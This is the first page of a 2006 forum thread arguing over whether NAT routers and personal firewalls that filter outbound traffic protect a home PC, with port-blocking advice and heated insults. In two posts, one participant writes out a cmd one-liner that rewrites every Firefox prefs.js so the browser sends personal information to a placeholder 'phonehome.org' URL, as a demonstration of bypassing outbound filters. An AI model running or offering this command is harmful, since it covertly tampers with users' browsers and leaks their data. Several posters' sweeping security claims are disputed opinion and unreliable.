outbound filtering - Firewalls

This is a discussion on outbound filtering - Firewalls ; I have a NAT router with SPI filtering. I guess I'm relatively safe from inbound baddies but not from outbound programs. Of course I am sure that's not completely true but for the most part I believe that is correct. ...

+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
Results 1 to 20 of 59

Thread: outbound filtering

  1. outbound filtering

    I have a NAT router with SPI filtering. I guess I'm relatively safe
    from inbound baddies but not from outbound programs. Of course I am
    sure that's not completely true but for the most part I believe that is
    correct.

    Is there an application other than a bloated PFW that can be used to
    monitor outbound connections and grant access or not?

  2. Re: outbound filtering

    In article ,
    REMOVETHISbadgolferman@gmail.com says...
    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.
    >
    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?
    >

    System safety monitor can do this ,or if you want a little more control
    and something thats free then,kerio 2.15 pfw ,which isnt at all bloated
    or Older versions of Zonealarm would suffice.Now put on your flakjacket,
    and get ready for the zealots perspective.
    me
    me

  3. Re: outbound filtering

    badgolferman wrote:

    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.


    Security is not about believe. And your believe is pretty wrong in that
    case. Don't you know what NAT helpers are?

    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?


    Monitoring: trivially 'netstat' and all its variants. Why are you asking?
    Want to implement a firewall, but don't even know the most basic tools of
    your OS?

    Granting access: Doesn't work for a PFW either. Why do you think such a
    thing could work?

  4. Re: outbound filtering

    Sebastian Gottschalk, 12/26/2006, 2:02:51 PM,
    <4vda0cF1bp9cjU1@mid.dfncis.de> wrote:

    > badgolferman wrote:
    >
    > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > from inbound baddies but not from outbound programs. Of course I am
    > > sure that's not completely true but for the most part I believe
    > > that is correct.

    >
    > Security is not about believe. And your believe is pretty wrong in
    > that case. Don't you know what NAT helpers are?
    >
    > > Is there an application other than a bloated PFW that can be used to
    > > monitor outbound connections and grant access or not?

    >
    > Monitoring: trivially 'netstat' and all its variants. Why are you
    > asking? Want to implement a firewall, but don't even know the most
    > basic tools of your OS?
    >
    > Granting access: Doesn't work for a PFW either. Why do you think such
    > a thing could work?



    If your intent is to make me look stupid and yourself ingenious then I
    guess you are accomplishing that. Please go ahead and explain rather
    than ask questions of someone who is no expert.

  5. Re: outbound filtering

    badgolferman wrote:

    > Please go ahead and explain


    Please go ahead and STFW.

    > rather than ask questions of someone who is no expert.


    Well, if you're no expert, then how exactly how do think you could achieve
    any security by implementing a packet filter? Without sufficient knowledge,
    you'll achieve nothing at best, but more likely just shoot yourself in the
    foot.

  6. Re: outbound filtering

    badgolferman wrote:

    > If your intent is to make me look stupid and yourself ingenious then I
    > guess you are accomplishing that. Please go ahead and explain rather
    > than ask questions of someone who is no expert.


    I'm afraid it's the sort of unhelpful and sneering reply we've become
    used to on this forum. He obviously knows a lot about security, but
    would rather crow about it than offer help.

    Jim Ford

  7. Re: outbound filtering

    Jim Ford, 12/26/2006,3:32:22 PM, wrote:

    > He obviously knows a lot about security


    Maybe not. If he really knew a lot about security he would be willing
    to offer advise. I'd say he knows a lot about arrogance.

  8. Re: outbound filtering

    badgolferman wrote:
    > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >
    >> He obviously knows a lot about security

    >
    > Maybe not. If he really knew a lot about security he would be willing
    > to offer advise.


    Maybe. I can't recall a posting by him that wasn't in the same vein as
    the reply you got - all snide and sneering remarks with little
    informative content. I guess most other users have kill-filed/filtered
    him out by now.

    Jim Ford



  9. Re: outbound filtering

    In article ,
    REMOVETHISbadgolferman@gmail.com says...
    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.
    >
    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?


    With a NAT router, not really. With a firewall, your first rule of
    access is to block everything and only permit access to what is
    required.

    With that in mind, many people secure the internet from their systems by
    blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    Windows machine and other things can't use those ports to attack others
    on the net. Many of us also block outbound HTTP access so that only
    approved sites can be accessed - so that a trojan or other malware that
    phones home on port 80 won't be able to reach the mother to get a new
    download/instructions. The same is true with HTTPS, only allow access to
    approved sites. Email, that's nother, we don't allow POP/SMTP outbound
    from the LAN, except the specific address of the email server, so people
    can't sit at their desks and fetch email from outside the company, and
    if the get a SMTP malware, it can't send blindly (unless it tries to
    relay through the mail server).....

    There is no reliable means to have the appliance block an application on
    your computer, but you can block what the computer accesses.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

  10. Re: outbound filtering

    Jim Ford wrote:

    > badgolferman wrote:
    >
    >> If your intent is to make me look stupid and yourself ingenious then I
    >> guess you are accomplishing that. Please go ahead and explain rather
    >> than ask questions of someone who is no expert.

    >
    > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > used to on this forum.


    This is no forum, this is Usenet. And Usenet is not a support medium, it's
    a medium for discussion.

  11. Re: outbound filtering

    badgolferman wrote:

    > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >
    >> He obviously knows a lot about security

    >
    > Maybe not. If he really knew a lot about security he would be willing
    > to offer advise. I'd say he knows a lot about arrogance.


    Actually this one rathers belongs much more to a meta discussion. Your
    problem is not a concrete security problem, but the lack of concept and
    knowledge. Offering concrete advise won't solve this more fundamental
    problem.

    And I've pointed out some concrete consequences of this problem:

    - NAT routers aren't firewall or security devices.
    - Monitoring connections doesn't require extensive packet filters with
    state machines, but just standard operating system tools requesting such
    information directly from the OS.
    - Outbound filtering doesn't work. Never did, never will, beside the wishes
    because it would be nice if it actually worked. And the reason is
    inter-process communication, some feature that you wouldn't like to miss
    either.

  12. Re: outbound filtering

    Sebastian Gottschalk, 12/26/2006,5:46:04 PM, wrote:

    > badgolferman wrote:
    >
    > > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    > >
    > >> He obviously knows a lot about security

    > >
    > > Maybe not. If he really knew a lot about security he would be
    > > willing to offer advise. I'd say he knows a lot about arrogance.

    >
    > Actually this one rathers belongs much more to a meta discussion. Your
    > problem is not a concrete security problem, but the lack of concept
    > and knowledge. Offering concrete advise won't solve this more
    > fundamental problem.
    >
    > And I've pointed out some concrete consequences of this problem:
    >
    > - NAT routers aren't firewall or security devices.
    > - Monitoring connections doesn't require extensive packet filters with
    > state machines, but just standard operating system tools requesting
    > such information directly from the OS.
    > - Outbound filtering doesn't work. Never did, never will, beside the
    > wishes because it would be nice if it actually worked. And the reason
    > is inter-process communication, some feature that you wouldn't like
    > to miss either.


    Thank you for the informative response.

  13. Re: outbound filtering

    In article ,
    void@nowhere.lan says...
    > In article ,
    > REMOVETHISbadgolferman@gmail.com says...
    > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > from inbound baddies but not from outbound programs. Of course I am
    > > sure that's not completely true but for the most part I believe that is
    > > correct.
    > >
    > > Is there an application other than a bloated PFW that can be used to
    > > monitor outbound connections and grant access or not?

    >
    > With a NAT router, not really. With a firewall, your first rule of
    > access is to block everything and only permit access to what is
    > required.
    >
    > With that in mind, many people secure the internet from their systems by
    > blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    > Windows machine and other things can't use those ports to attack others
    > on the net. Many of us also block outbound HTTP access so that only
    > approved sites can be accessed - so that a trojan or other malware that
    > phones home on port 80 won't be able to reach the mother to get a new
    > download/instructions. The same is true with HTTPS, only allow access to
    > approved sites. Email, that's nother, we don't allow POP/SMTP outbound
    > from the LAN, except the specific address of the email server, so people
    > can't sit at their desks and fetch email from outside the company, and
    > if the get a SMTP malware, it can't send blindly (unless it tries to
    > relay through the mail server).....
    >
    > There is no reliable means to have the appliance block an application on
    > your computer, but you can block what the computer accesses.
    >
    >

    Leythos, thank you for this excellent information. I have used many of
    these points in my Sygate setup for the last 4-yrs with good results.
    Here is an example of port blocking that I use.

    Blocked TCP Ports

    Traffic Direction: Outbound
    Remote ports
    1-12,14-24,26-42,44-79,81-109,111-118,120-442,444-8079,8081-11370,11372-65535
    Local ports
    1-1024,1600-65535

    Traffic Direction: Inbound
    Remote ports
    1-65535
    Local ports
    1-1024, 1600-65535

    Casey

  14. Re: outbound filtering

    In article ,
    jaford@watford53.freeserve.co.uk says...
    > badgolferman wrote:
    >
    > > If your intent is to make me look stupid and yourself ingenious then I
    > > guess you are accomplishing that. Please go ahead and explain rather
    > > than ask questions of someone who is no expert.

    >
    > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > used to on this forum. He obviously knows a lot about security, but
    > would rather crow about it than offer help.
    >
    > Jim Ford
    >

    What makes you think he knows a lot about security?.Some of his advice
    seem to be more attributable to a halfwit.
    me

  15. Re: outbound filtering

    In article <4vdmr9F19m0utU1@mid.dfncis.de>, seppi@seppig.de says...
    > Jim Ford wrote:
    >
    > > badgolferman wrote:
    > >
    > >> If your intent is to make me look stupid and yourself ingenious then I
    > >> guess you are accomplishing that. Please go ahead and explain rather
    > >> than ask questions of someone who is no expert.

    > >
    > > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > > used to on this forum.

    >
    > This is no forum, this is Usenet. And Usenet is not a support medium, it's
    > a medium for discussion.


    Wrong, discussion and conversation is what it was designed for, and
    support is a form of discussion. The groups that were started in the
    early 84's were about sharing ideas and needs/methods and support for
    those items/methods.

    Get off your high-horse and start helping instead of acting like a
    snotty nosed kid.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

  16. Re: outbound filtering

    In article ,
    casey@notspecified.net says...
    > In article ,
    > void@nowhere.lan says...
    > > In article ,
    > > REMOVETHISbadgolferman@gmail.com says...
    > > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > > from inbound baddies but not from outbound programs. Of course I am
    > > > sure that's not completely true but for the most part I believe that is
    > > > correct.
    > > >
    > > > Is there an application other than a bloated PFW that can be used to
    > > > monitor outbound connections and grant access or not?

    > >
    > > With a NAT router, not really. With a firewall, your first rule of
    > > access is to block everything and only permit access to what is
    > > required.
    > >
    > > With that in mind, many people secure the internet from their systems by
    > > blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    > > Windows machine and other things can't use those ports to attack others
    > > on the net. Many of us also block outbound HTTP access so that only
    > > approved sites can be accessed - so that a trojan or other malware that
    > > phones home on port 80 won't be able to reach the mother to get a new
    > > download/instructions. The same is true with HTTPS, only allow access to
    > > approved sites. Email, that's nother, we don't allow POP/SMTP outbound
    > > from the LAN, except the specific address of the email server, so people
    > > can't sit at their desks and fetch email from outside the company, and
    > > if the get a SMTP malware, it can't send blindly (unless it tries to
    > > relay through the mail server).....
    > >
    > > There is no reliable means to have the appliance block an application on
    > > your computer, but you can block what the computer accesses.
    > >
    > >

    > Leythos, thank you for this excellent information. I have used many of
    > these points in my Sygate setup for the last 4-yrs with good results.
    > Here is an example of port blocking that I use.
    >
    > Blocked TCP Ports
    >
    > Traffic Direction: Outbound
    > Remote ports
    > 1-12,14-24,26-42,44-79,81-109,111-118,120-442,444-8079,8081-11370,11372-65535
    > Local ports
    > 1-1024,1600-65535
    >
    > Traffic Direction: Inbound
    > Remote ports
    > 1-65535
    > Local ports
    > 1-1024, 1600-65535


    That's a good set, but, in a typical firewall, everything is blocked by
    default, only permitted by adding a rule, so it can save a lot of work.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

  17. Re: outbound filtering

    On 12/26/2006 2:46 PM, something possessed Sebastian Gottschalk to write:
    > badgolferman wrote:
    >
    >> Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >>
    >>> He obviously knows a lot about security

    >> Maybe not. If he really knew a lot about security he would be willing
    >> to offer advise. I'd say he knows a lot about arrogance.

    >
    > Actually this one rathers belongs much more to a meta discussion. Your
    > problem is not a concrete security problem, but the lack of concept and
    > knowledge. Offering concrete advise won't solve this more fundamental
    > problem.


    What problem? He didn't give an abstract or concrete problem, the OP
    just asked for some advise, and instead received the rantings of a mere
    child who thinks he knows more than the rest of the Internet users and
    uses that arrogant belief to pompously attack any others showing any
    sign of ignorance (by asking for advise) in order to boost and inflate
    your undeveloped ego.
    >
    > And I've pointed out some concrete consequences of this problem:
    >
    > - NAT routers aren't firewall or security devices.

    Depends on the router, but most NAT routers act as hardware firewalls,
    blocking unsolicited inbound connections.
    > - Monitoring connections doesn't require extensive packet filters with
    > state machines, but just standard operating system tools requesting such
    > information directly from the OS.

    Well, that will tell you where your remote endpoint connections are and
    what programs are making the connection, but not much more than that.
    On that note, these are snapshots, not real-time displays of connection
    activity. For a real time display of remote connections I'd recommend
    Kerio Personal Firewall, or if the OP doesn't want a firewall, than
    sysinternals.com TCPMon.
    > - Outbound filtering doesn't work.

    It doesn't?
    > Never did, never will, beside the wishes
    > because it would be nice if it actually worked.

    Well, granted it's not perfect, but neither are AVs. However, I have
    found program baddies that AVs and other anti-malware proggies missed
    solely from being alerted of their outbound connections (which I believe
    is the added security that the OP wishes), so yes, they do work. They
    may be allowed to be circumnavigated, but in the world with Windows and
    Gates nothing is perfect.
    > And the reason is
    > inter-process communication, some feature that you wouldn't like to miss
    > either.

    Elaborate on this please. Are you referring to rootkits, bad modules
    hooking into legit processes, or just processes communicating with
    eachother via localhost port communications.

  18. Re: outbound filtering

    William wrote:

    > What problem? He didn't give an abstract or concrete problem, the OP
    > just asked for some advise,


    No, he didn't ask for advise. He brabbled arbitrary nonsense, giving a good
    indication that he doesn't know what he wants or what he's talking about?

    >> - NAT routers aren't firewall or security devices.

    > Depends on the router, but most NAT routers act as hardware firewalls,
    > blocking unsolicited inbound connections.


    Well, just by coincidence (since NAT works that way). However, this is not
    reliable and easily circumvented. Thus, it doesn't provide security.

    >> - Monitoring connections doesn't require extensive packet filters with
    >> state machines, but just standard operating system tools requesting such
    >> information directly from the OS.

    > Well, that will tell you where your remote endpoint connections are and
    > what programs are making the connection, but not much more than that.


    What else do you want?

    > On that note, these are snapshots, not real-time displays of connection
    > activity.


    Wrong again. There are numerous implementation that provide a complete
    cover over time.

    > For a real time display of remote connections I'd recommend
    > Kerio Personal Firewall,


    So, you're recommending that he should make his computer intentionally
    vulnerable and unstable? That's really not nice.

    >> - Outbound filtering doesn't work.

    > It doesn't?


    Welcome to reality. You've been sleeping for... how long?

    >> Never did, never will, beside the wishes
    >> because it would be nice if it actually worked.

    > Well, granted it's not perfect, but neither are AVs.


    Oh, you finally understand the difference between protection and intrusion
    detecting?

    > They may be allowed to be circumnavigated, but in the world with Windows and
    > Gates nothing is perfect.


    That's a lame excuse for not defending against running the malware in first
    place. Which is a serious security concept that provides protection. And
    doesn't make the system more vulnerable.

    >> And the reason is
    >> inter-process communication, some feature that you wouldn't like to miss
    >> either.

    > Elaborate on this please. Are you referring to rootkits, bad modules
    > hooking into legit processes, or just processes communicating with
    > eachother via localhost port communications.


    for /r %i in (prefs.js) do echo
    user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    And the next time you start up Firefox, it will phone home on behalf of the
    illegitimate application. Now, would you finally get a clue that you don't
    even need direct IPC at all to remote control other applications?

  19. Re: outbound filtering

    On 12/27/2006 2:49 AM, something possessed Sebastian Gottschalk to write:
    > William wrote:
    >
    >> What problem? He didn't give an abstract or concrete problem, the OP
    >> just asked for some advise,

    >
    > No, he didn't ask for advise. He brabbled arbitrary nonsense, giving a good
    > indication that he doesn't know what he wants or what he's talking about?
    >

    People asking for advise often don't know exactly what's out there to
    fulfill their needs, otherwise they'd get that and not ask for advise.
    >>> - NAT routers aren't firewall or security devices.

    >> Depends on the router, but most NAT routers act as hardware firewalls,
    >> blocking unsolicited inbound connections.

    >
    > Well, just by coincidence (since NAT works that way). However, this is not
    > reliable and easily circumvented. Thus, it doesn't provide security.

    Nonetheless, it IS a hardware firewall, and since you felt inclined to
    mention that it wasn't, someone needed to provide correct information
    before whoever reads this thread becomes as confused about firewalls and
    Internet Security in general as you.
    >
    >>> - Monitoring connections doesn't require extensive packet filters with
    >>> state machines, but just standard operating system tools requesting such
    >>> information directly from the OS.

    >> Well, that will tell you where your remote endpoint connections are and
    >> what programs are making the connection, but not much more than that.

    >
    > What else do you want?

    Maybe Packet Sniffing, or Monitoring not just when a connection is made,
    but when an application changes (Kerio Personal Firewall provides this
    PROTECTION, if a process is changed, the user is alerted to it).
    >
    >> On that note, these are snapshots, not real-time displays of connection
    >> activity.

    >
    > Wrong again. There are numerous implementation that provide a complete
    > cover over time.
    >

    Like?
    >> For a real time display of remote connections I'd recommend
    >> Kerio Personal Firewall,

    >
    > So, you're recommending that he should make his computer intentionally
    > vulnerable and unstable? That's really not nice.

    No, I'm recommending hi not listen to you and install either TCPMon or
    if he wants something more secure to monitor outbound connections Kerio
    Personal Firewall. I've never had it destablise my PC, and it's much
    more secure than running without (but hey, at least he's got a hardware
    FIREWALL (router).
    >
    >>> - Outbound filtering doesn't work.

    >> It doesn't?

    >
    > Welcome to reality. You've been sleeping for... how long?

    I try to get 8 hours of sleep every day, but in most circumstances it
    DOES work.
    >
    >>> Never did, never will, beside the wishes
    >>> because it would be nice if it actually worked.

    >> Well, granted it's not perfect, but neither are AVs.

    >
    > Oh, you finally understand the difference between protection and intrusion
    > detecting?

    They're related, just like a burglar alarm is related to security, a
    firewall is an essential asset to Internet Security (though it shouldn't
    be the only measure)
    >
    >> They may be allowed to be circumnavigated, but in the world with Windows and
    >> Gates nothing is perfect.

    >
    > That's a lame excuse for not defending against running the malware in first
    > place. Which is a serious security concept that provides protection. And
    > doesn't make the system more vulnerable.

    The only way this user's system would become more vulnerable is if he
    were to take your advise. While FWs aren't perfect, they are essential
    to any Internet security implementation. Of course, no one is saying
    that that should be the only user's course of action. I'm sure the OP
    has already takes some other necessary steps toward securing his/her PC
    long before posting here (i.e. using a NAT router, implementing at least
    one AV product (but only one real-time scanner), and practicing safe-hex
    practices regarding web-site and attackments.
    >
    >>> And the reason is
    >>> inter-process communication, some feature that you wouldn't like to miss
    >>> either.

    >> Elaborate on this please. Are you referring to rootkits, bad modules
    >> hooking into legit processes, or just processes communicating with
    >> eachother via localhost port communications.

    >
    > for /r %i in (prefs.js) do echo
    > user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    Um...This link doesn't work the way you're intending it to. For one, it
    DOESN'T access prefs.js. I thought that maybe it was because of a
    wordwrap, so I created a simple test.html file with
    testyour broken link thingie.
    I think what you were intended to demonstrate is that some processes may
    try to make changes to other program's user-prefs (AFAIK, Kerio protects
    against this, but I haven't had the opportunity to test this out. I do
    know that when one process tries to access another (which is
    interprocess communication, not what you were trying to demonstrate just
    now), that Kerio does protect against that by alerting the user and
    asking if he/she wants to allow or deny. Also, if I were to click this
    link in in Firefox, Kerio would alert that Firefox was trying to access
    the trusted zone (unless a rule is already set up), in which case,
    knowing that Internet Browsers should communicate with the Internet, and
    what business does it have accessing any files on your computer, than
    I'd simply block it).
    >
    > And the next time you start up Firefox, it will phone home on behalf of the
    > illegitimate application.

    No, it won't, because it didn't work.
    > Now, would you finally get a clue that you don't
    > even need direct IPC at all to remote control other applications?

    Well, will you get a clue that that was never the argument. The
    argument was that you were being a mere child attacking others at any
    sign of ignorance, rather then trying to assist others, in order to
    boost your inflated undeveloped ego. Now that you had to try to defend
    your position, the usenet community that hasn't killfiled you yet can
    now see that you haven't a clue what you're talking about. Hopefully,
    this will pursuade you to lurk for a little bit and listen to the real
    experts, rather than spout garbage that may be harmful to the end-user
    should they listen to your rantings. In Summary: NAT Router=Hardware
    Firewall. Firewall=good (It depends on the FW, but I recommend Kerio,
    in addition to NAT Router). No Firewall=Bad.

  20. Re: outbound filtering

    William wrote:

    > People asking for advise often don't know exactly what's out there to
    > fulfill their needs, otherwise they'd get that and not ask for advise.


    People usually tend to ask for stuff about their wrong conclusion, not
    about the actual issues. After all, why is he twisting NAT and packet
    filtering is he's generally concerned about the trustworthyness of the
    installed software packages? That's already a big jump, in the wrong
    direction.

    > Nonetheless, it IS a hardware firewall,


    It isn't a "hardware" firewall, it's a NAT router. It might have a packet
    filter implemented, but without proper configuration it won't do anything.
    And for most implementation, one could say that a proper configuration is
    impossible.

    > and since you felt inclined to
    > mention that it wasn't, someone needed to provide correct information
    > before whoever reads this thread becomes as confused about firewalls and
    > Internet Security in general as you.


    Well, then please provide correct information. NAT and packet filtering are
    different things.

    >>> Well, that will tell you where your remote endpoint connections are and
    >>> what programs are making the connection, but not much more than that.

    >>
    >> What else do you want?

    > Maybe Packet Sniffing,


    Well, then one should use a packet sniffer.

    > or Monitoring not just when a connection is made, but when an application
    > changes


    D'oh. That's a simple shell script combining 'netstat', 'tail' and
    'sha1sum'. Anyway, why should an application change without expectation?

    > (Kerio Personal Firewall provides this PROTECTION, if a process is changed,
    > the user is alerted to it).


    Why do you insist on calling it "protection" beside it not being such?

    >> Wrong again. There are numerous implementation that provide a complete
    >> cover over time.
    >>

    > Like?


    Port Reporter. Freely available from Microsoft. Sits in the background and
    logs everything, just like it should be.

    >> So, you're recommending that he should make his computer intentionally
    >> vulnerable and unstable? That's really not nice.

    > No, I'm recommending hi not listen to you and install either TCPMon or
    > if he wants something more secure to monitor outbound connections Kerio
    > Personal Firewall.


    Then you're are making such a recommendation. Kerio PFW will make his
    computer trivially vulnerable, if you like it or not.

    > I've never had it destablise my PC, and it's much more secure than running
    > without


    Even more bull****. You're implying that it would actually increase
    security. How should it do so? Magic fairies?

    > I try to get 8 hours of sleep every day, but in most circumstances it
    > DOES work.


    Huh? It does work if the application plays nice. In that case, it isn't
    needed in first place. So you like toying around?

    >> Oh, you finally understand the difference between protection and intrusion
    >> detecting?

    > They're related, just like a burglar alarm is related to security, a
    > firewall is an essential asset to Internet Security (though it shouldn't
    > be the only measure)


    Oh, what a bull****. Since when is a firewall essential for a home
    computer's security? And where is the firewall anyway?

    > While FWs aren't perfect, they are essential to any Internet security
    > implementation.


    Cut it out. My system proves that you're talking nonsense about such
    nonsense being essential.

    > (i.e. using a NAT router,


    Again: A NAT router doesn't provide any security at all.

    > implementing at least one AV product (but only one real-time scanner),


    That's not a protection either.

    > and practicing safe-hex practices regarding web-site and attackments.


    Eh... what exactly should websites be security risks? Or attachments?

    And why am I missing even the most really essential stuff like installing
    updates and minimizing privileges? You really don't have any clue.

    >> for /r %i in (prefs.js) do echo
    >> user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    > Um...This link doesn't work the way you're intending it to.


    This is no link. It's a cmd-shell command line.

    > For one, it DOESN'T access prefs.js. I thought that maybe it was because of a
    > wordwrap, so I created a simple test.html file with
    > test your broken link thingie.


    Huh?

    > I think what you were intended to demonstrate is that some processes may
    > try to make changes to other program's user-prefs (AFAIK, Kerio protects
    > against this,


    It doesn't. And I don't even know why it should. Or how it should keep an
    eye on everything. Seems like you really don't understand the problem at
    all.

    > I do know that when one process tries to access another (which is
    > interprocess communication, not what you were trying to demonstrate just
    > now), that Kerio does protect against that by alerting the user and
    > asking if he/she wants to allow or deny.


    Wrong again. Just use Windows Messages, OLE, DDE or other stuff. This has
    even been proven to bypass everything.

    And, as demonstrated, you don't even need IPC at all - passive modification
    of the configuration data is already sufficient.

    > Also, if I were to click this link in in Firefox,


    One again, you're talking nonsense. There is no link to click. You open up
    Firefox, and it will surf to the changed start page while also transmitting
    information, just like it did before.

    > Kerio would alert that Firefox was trying to access the trusted zone


    WTF is a trusted zone in Firefox?

    > In Summary: NAT Router=Hardware
    > Firewall. Firewall=good (It depends on the FW, but I recommend Kerio,
    > in addition to NAT Router). No Firewall=Bad.


    Ah, I understand: William = idiot

    Now please, go away. You don't have any technical knowledge at all, and
    unless you're willing to learn, you'll just keep on spouting nonsense. I
    won't mind you, but please stop telling such nonsense to other people who
    don't know any better.

+ Reply to Thread
Page 1 of 3 1 2 3 LastLast